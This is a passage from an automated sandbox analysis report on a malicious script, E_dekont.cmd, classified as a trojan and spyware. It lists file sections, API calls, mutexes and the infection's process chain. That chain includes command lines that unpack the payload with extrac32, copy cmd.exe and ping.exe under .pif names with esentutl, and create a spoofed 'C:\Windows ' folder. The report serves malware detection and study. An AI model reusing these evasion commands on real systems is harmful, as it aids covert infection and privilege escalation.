                Source: AppVClient.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jaureg.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jucheck.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jusched.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaw.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaws.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleCrashHandler.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleCrashHandler64.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdate.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateBroker.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: DiagnosticsHub.StandardCollector.Service.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: FXSSVC.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: elevation_service.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: maintenanceservice.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateComRegisterShell64.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateCore.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: GoogleUpdateOnDemand.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jabswitch.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java-rmi.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: java.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javacpl.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaw.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: javaws.exe0.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msdtc.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msiexec.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: PerceptionSimulationService.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jjs.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jp2launcher.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: keytool.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: kinit.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: klist.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ktab.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: orbd.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: pack200.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: policytool.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: rmid.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: perfhost.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Locator.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: MsSense.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SensorDataService.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: snmptrap.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Spectrum.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ssh-agent.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: TieringEngineService.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: rmiregistry.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: servertool.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ssvagent.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: tnameserv.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: unpack200.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: ie_to_edge_stub.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: cookie_exporter.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: identity_helper.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: setup.exe1.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: msedgewebview2.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AgentService.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: vds.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: VSSVC.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: wbengine.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: WmiApSrv.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: wmpnetwk.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SearchIndexer.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: 7z.exe.12.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winCMD@53/167@363/23
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02AF7FD4 GetDiskFreeSpaceA,4_2_02AF7FD4
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9,12_1_004019F0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B06DC8 CoCreateInstance,4_2_02B06DC8
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9,12_1_004019F0
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,30_2_1002CBD0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac5-inf
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMutant created: \Sessions\1\BaseNamedObjects\YfJ3kkV1qkbw4RSw
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMutant created: NULL
                Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac59ea72c54-b
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac53d78ffaf-b
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_03
                Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\CAB04912.TMPJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCommand line argument: 08A12_1_00413780
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCommand line argument: 08A30_2_00413780
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCommand line argument: 08A30_2_00413780
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCommand line argument: 08A30_1_00413780
                Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: E_dekont.cmdReversingLabs: Detection: 44%
                Source: E_dekont.cmdVirustotal: Detection: 46%
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o
                Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                Source: unknownProcess created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
                Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                Source: unknownProcess created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
                Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /oJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pifJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
